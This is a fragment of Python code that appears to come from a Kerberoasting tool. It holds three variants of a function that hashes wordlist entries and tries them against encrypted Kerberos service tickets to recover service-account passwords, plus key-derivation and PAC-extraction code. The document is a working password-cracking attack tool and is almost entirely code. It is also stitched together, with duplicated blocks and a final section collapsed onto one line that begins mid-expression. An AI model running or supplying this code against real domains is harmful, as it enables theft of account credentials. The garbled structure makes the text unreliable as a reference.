def crack(wordlist, enctickets):
    """Test queued candidate words against every ticket still in *enctickets*.

    Each word is NTLM-hashed and handed to ``kerberos.decrypt``. A truthy
    first return value is reported as a found password.

    Args:
        wordlist: Queue-like object whose ``get()`` returns the next
            candidate word. The literal
            ``'ENDOFQUEUEENDOFQUEUEENDOFQUEUE'`` ends the run.
        enctickets: Mutable list of ticket entries. Index 0 is the blob
            passed to ``kerberos.decrypt``, index 1 is printed as the
            ticket number and index 2 as the file. Matched entries are
            removed from this list in place.

    Returns:
        None. The function stops when the end marker is read, when
        *enctickets* becomes empty, or when removing a matched entry fails.
    """
    end_marker = 'ENDOFQUEUEENDOFQUEUEENDOFQUEUE'
    # Created once and never cleared: matches from earlier words are still
    # in this list when the removal loop runs for later words.
    matched = []
    while enctickets:
        try:
            candidate = wordlist.get()
            if candidate == end_marker:
                break
            # Round-trip through utf-8 / utf-8-sig, then trim, for display only.
            shown = candidate.encode('utf-8').decode('utf-8-sig').strip()
            print("\ntrying %s" % shown)
            for entry in enctickets:
                kdata, nonce = kerberos.decrypt(
                    kerberos.ntlmhash(candidate), 2, entry[0])
                if not kdata:
                    continue
                print('found password for ticket %i: %s File: %s' % (
                    entry[1], candidate, entry[2]))
                matched.append(entry)
            for entry in matched:
                try:
                    enctickets.remove(entry)
                except:
                    # Entry is no longer in the list (or remove failed): stop.
                    return
                if not enctickets:
                    return
        except:
            # NOTE(review): this bare except also swallows KeyboardInterrupt
            # and every kerberos/encoding error, then moves to the next word.
            continue
def crack(wordlist, enctickets):
    """Test queued candidate words against every ticket still in *enctickets*.

    Each word is NTLM-hashed and handed to ``kerberos.decrypt``. A truthy
    first return value is reported as a found password.

    Args:
        wordlist: Queue-like object whose ``get()`` returns the next
            candidate word. This variant checks for no end-of-queue marker,
            so the loop relies entirely on ``get()``
            (presumably blocking when empty -- confirm against the caller).
        enctickets: Mutable list of ticket entries. Index 0 is the blob
            passed to ``kerberos.decrypt``, index 1 is printed as the
            ticket number and index 2 as the file. Matched entries are
            removed from this list in place.

    Returns:
        None. The function stops when *enctickets* becomes empty or when
        removing a matched entry fails.
    """
    # Created once and never cleared: matches from earlier words are still
    # in this list when the removal loop runs for later words.
    matched = []
    while enctickets:
        candidate = wordlist.get()
        # Per-word progress output is disabled in this variant.
        for entry in enctickets:
            kdata, nonce = kerberos.decrypt(
                kerberos.ntlmhash(candidate), 2, entry[0])
            if not kdata:
                continue
            print('found password for ticket %i: %s File: %s' % (
                entry[1], candidate, entry[2]))
            matched.append(entry)
        for entry in matched:
            try:
                enctickets.remove(entry)
            except:
                # Entry is no longer in the list (or remove failed): stop.
                return
            if not enctickets:
                return
def crack(wordlist, enctickets):
    """Test queued candidate words against every ticket still in *enctickets*.

    Each word is NTLM-hashed and handed to ``kerberos.decrypt``. A truthy
    first return value is reported as a found password.

    Args:
        wordlist: Queue-like object whose ``get()`` returns the next
            candidate word. The literal
            ``'ENDOFQUEUEENDOFQUEUEENDOFQUEUE'`` ends the run.
        enctickets: Mutable list of ticket entries. Index 0 is the blob
            passed to ``kerberos.decrypt``, index 1 is printed as the
            ticket number and index 2 as the file. Matched entries are
            removed from this list in place.

    Returns:
        None. The function stops when the end marker is read, when
        *enctickets* becomes empty, or when removing a matched entry fails.
    """
    end_marker = 'ENDOFQUEUEENDOFQUEUEENDOFQUEUE'
    # Created once and never cleared: matches from earlier words are still
    # in this list when the removal loop runs for later words.
    matched = []
    while enctickets:
        candidate = wordlist.get()
        if candidate == end_marker:
            break
        # Per-word progress output is disabled in this variant.
        for entry in enctickets:
            kdata, nonce = kerberos.decrypt(
                kerberos.ntlmhash(candidate), 2, entry[0])
            if not kdata:
                continue
            print('found password for ticket %i: %s File: %s' % (
                entry[1], candidate, entry[2]))
            matched.append(entry)
        for entry in matched:
            try:
                enctickets.remove(entry)
            except:
                # Entry is no longer in the list (or remove failed): stop.
                return
            if not enctickets:
                return
# Optional output switches; both default to off.
parser.add_argument(
    '-v', '--verbose', dest='verbose', action='store_true',
    required=False, default=False, help='verbose')
parser.add_argument(
    '-d', '--debug', dest='debug', action='store_true',
    required=False, default=False, help='show debug messages')
# The '-t/--enctype' option is disabled. Its help text read:
# 'message type, from RAM it is 2 (This should not need to be changed)'.
#parser.add_argument('-t', '--enctype', dest='enctype', action='store', required=False, default=2,
#                    metavar='2', type=int,
#                    help='message type, from RAM it is 2 (This should not need to be changed)')
args = parser.parse_args()

# Derive the key: an explicit NT hash (-n) wins over a password (-p).
# NOTE(review): both options put the secret on the command line, where
# process listings and shell history can expose it.
if args.nthash is not None:
    # str.decode('hex') exists only on Python 2.
    key = args.nthash.decode('hex')
elif args.password is not None:
    key = kerberos.ntlmhash(args.password)
else:
    print("You must provide either the password (-p) or the hash (-n)")
    exit(1)

# Read the whole ticket file, then release the handle.
fullraw = args.infile.read()
args.infile.close()

# The rewriteticket() call is disabled; only the PAC is extracted and parsed.
#newticket = rewriteticket(key, fullraw, debug=args.debug, verbose=args.verbose)
pac = getpac(key, fullraw)
pacobj = PAC.PAC(pac)
# Optional output switches; both default to off.
parser.add_argument(
    '-v', '--verbose', dest='verbose', action='store_true',
    required=False, default=False, help='verbose')
parser.add_argument(
    '-d', '--debug', dest='debug', action='store_true',
    required=False, default=False, help='show debug messages')
# The '-t/--enctype' option is disabled. Its help text read:
# 'message type, from RAM it is 2 (This should not need to be changed)'.
#parser.add_argument('-t', '--enctype', dest='enctype', action='store', required=False, default=2,
#                    metavar='2', type=int,
#                    help='message type, from RAM it is 2 (This should not need to be changed)')
args = parser.parse_args()

# Derive the key: an explicit NT hash (-n) wins over a password (-p).
# NOTE(review): both options put the secret on the command line, where
# process listings and shell history can expose it.
if args.nthash is not None:
    # str.decode('hex') exists only on Python 2.
    key = args.nthash.decode('hex')
elif args.password is not None:
    key = kerberos.ntlmhash(args.password)
else:
    print("You must provide either the password (-p) or the hash (-n)")
    exit(1)

# Read the whole ticket file, then release the handle.
fullraw = args.infile.read()
args.infile.close()

# The rewriteticket() call is disabled; only the PAC is extracted and parsed.
#newticket = rewriteticket(key, fullraw, debug=args.debug, verbose=args.verbose)
pac = getpac(key, fullraw)
pacobj = PAC.PAC(pac)
((decoder.decode(data)[0][2][0][3][2]).asOctets(), i, f)) i += 1 elif data[:2] == '6d': for ticket in data.strip().split('\n'): enctickets.append(((decoder.decode( ticket.decode('hex'))[0][4][3][2]).asOctets(), i, f)) i += 1 if len(enctickets): print("Cracking %i tickets..." % len(enctickets)) else: print("No tickets found") sys.exit() # load wordlist for w in args.wordlistfile: word = w.decode('utf-8').strip() hash = kerberos.ntlmhash(word) for et in enctickets: kdata, nonce = kerberos.decrypt(hash, 2, et[0]) if kdata: print('found password for ticket %i: %s File: %s' % (et[1], word, et[2])) enctickets.remove(et) if len(enctickets) == 0: print('Successfully cracked all tickets') sys.exit() if len(enctickets): print("Unable to crack %i tickets" % len(enctickets))